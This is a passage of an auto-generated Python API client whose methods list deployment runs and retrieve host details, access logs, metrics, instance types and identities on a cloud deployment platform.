:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalDeploymentRun], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_runs" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_runs`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/deployments/{id}/runs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalDeploymentRun]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_runs1(self, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the user's relevant Deployment Runs matching a specified query. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs1(search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str search_type: Deployment run status (required)
:param bool in_project: Include project runs
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalDeploymentRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_runs1_with_http_info(search_type, **kwargs) # noqa: E501
def get_deployment_runs1_with_http_info(self, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the user's relevant Deployment Runs matching a specified query. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs1_with_http_info(search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str search_type: Deployment run status (required)
:param bool in_project: Include project runs
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalDeploymentRun], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['search_type', 'in_project', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_runs1" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'search_type' is set
if self.api_client.client_side_validation and ('search_type' not in local_var_params or # noqa: E501
local_var_params['search_type'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_type` when calling `get_deployment_runs1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'search_type' in local_var_params and local_var_params['search_type'] is not None: # noqa: E501
query_params.append(('search_type', local_var_params['search_type'])) # noqa: E501
if 'in_project' in local_var_params and local_var_params['in_project'] is not None: # noqa: E501
query_params.append(('in_project', local_var_params['in_project'])) # noqa: E501
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalDeploymentRun]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host(self, id, hostid, **kwargs): # noqa: E501
"""Retrieve Host # noqa: E501
Returns the specified Host in the Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullDeploymentRunHost
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_with_http_info(id, hostid, **kwargs) # noqa: E501
def get_host_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""Retrieve Host # noqa: E501
Returns the specified Host in the Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullDeploymentRunHost, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_host`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullDeploymentRunHost', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_access(self, id, hostid, **kwargs): # noqa: E501
"""List Host Access Logs # noqa: E501
Returns a collection of the Host Access Logs for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_access(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[RemoteAccessSession]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_access_with_http_info(id, hostid, **kwargs) # noqa: E501
def get_host_access_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""List Host Access Logs # noqa: E501
Returns a collection of the Host Access Logs for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_access_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[RemoteAccessSession], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_access`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_host_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/access', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[RemoteAccessSession]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_configuration_metrics(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched by members of the specified Project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of project (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_configuration_metrics_with_http_info(id, start, end, **kwargs) # noqa: E501
def get_host_configuration_metrics_with_http_info(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched by members of the specified Project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics_with_http_info(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of project (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'start', 'end', 'interval', 'interval_unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_configuration_metrics" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_configuration_metrics`") # noqa: E501
# verify the required parameter 'start' is set
if self.api_client.client_side_validation and ('start' not in local_var_params or # noqa: E501
local_var_params['start'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `start` when calling `get_host_configuration_metrics`") # noqa: E501
# verify the required parameter 'end' is set
if self.api_client.client_side_validation and ('end' not in local_var_params or # noqa: E501
local_var_params['end'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `end` when calling `get_host_configuration_metrics`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'start' in local_var_params and local_var_params['start'] is not None: # noqa: E501
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'end' in local_var_params and local_var_params['end'] is not None: # noqa: E501
query_params.append(('end', local_var_params['end'])) # noqa: E501
if 'interval' in local_var_params and local_var_params['interval'] is not None: # noqa: E501
query_params.append(('interval', local_var_params['interval'])) # noqa: E501
if 'interval_unit' in local_var_params and local_var_params['interval_unit'] is not None: # noqa: E501
query_params.append(('intervalUnit', local_var_params['interval_unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/projects/{id}/metrics/hostconfiguration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_instance_types(self, id, hostid, **kwargs): # noqa: E501
"""List available instance types for host # noqa: E501
Returns a collection of available instance types for resizing a Deployment Run Host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_instance_types(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TargetInstanceTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_instance_types_with_http_info(id, hostid, **kwargs) # noqa: E501
def get_host_instance_types_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""List available instance types for host # noqa: E501
Returns a collection of available instance types for resizing a Deployment Run Host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_instance_types_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TargetInstanceTypes, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_instance_types" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_instance_types`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_host_instance_types`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/resize', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TargetInstanceTypes', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_identities(self, id, hostid, **kwargs): # noqa: E501
"""Get Host Identities # noqa: E501
Returns a collection of identities for the deployment run host # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identities(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[BaseIdentity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_identities_with_http_info(id, hostid, **kwargs) # noqa: E501
def get_identities_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""Get Host Identities # noqa: E501
Returns a collection of identities for the deployment run host # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identities_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[BaseIdentity], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_identities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_identities`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_identities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[BaseIdentity]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_identity(self, id, hostid, **kwargs): # noqa: E501
"""Get Host Identity For User # noqa: E501
Returns the deployment run host identity for the user, if one exists. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identity(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[CloudResourceAccessListing]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_identity_with_http_info(id, hostid, **kwargs) # noqa: E501
def get_identity_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""Get Host Identity For User # noqa: E501
Returns the deployment run host identity for the user, if one exists. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identity_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[CloudResourceAccessListing], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_identity`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identity', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[CloudResourceAccessListing]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def perform_host_action(self, id, deploymentrunhostid, action, **kwargs): # noqa: E501
"""Execute Host Action # noqa: E501
Executes an action against the specified Host in the Deployment Run for the ID provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_host_action(id, deploymentrunhostid, action, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str deploymentrunhostid: ID of host (required)
:param str action: Action to perform (required)
:param int cpu: Desired number of CPUs, if resizing host in a non instance type based virtualization realm
:param int ram: Desired amount of RAM in Mebibytes, if resizing host in a non instance type based virtualization realm
:param str instance_type_name: The instance type name to resize to, if resizing host in an instance type based virtualization realm
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.perform_host_action_with_http_info(id, deploymentrunhostid, action, **kwargs) # noqa: E501
def perform_host_action_with_http_info(self, id, deploymentrunhostid, action, **kwargs): # noqa: E501
"""Execute Host Action # noqa: E501
Executes an action against the specified Host in the Deployment Run for the ID provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_host_action_with_http_info(id, deploymentrunhostid, action, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str deploymentrunhostid: ID of host (required)
:param str action: Action to perform (required)
:param int cpu: Desired number of CPUs, if resizing host in a non instance type based virtualization realm
:param int ram: Desired amount of RAM in Mebibytes, if resizing host in a non instance type based virtualization realm
:param str instance_type_name: The instance type name to resize to, if resizing host in an instance type based virtualization realm
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'deploymentrunhostid', 'action', 'cpu', 'ram', 'instance_type_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method perform_host_action" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `perform_host_action`") # noqa: E501
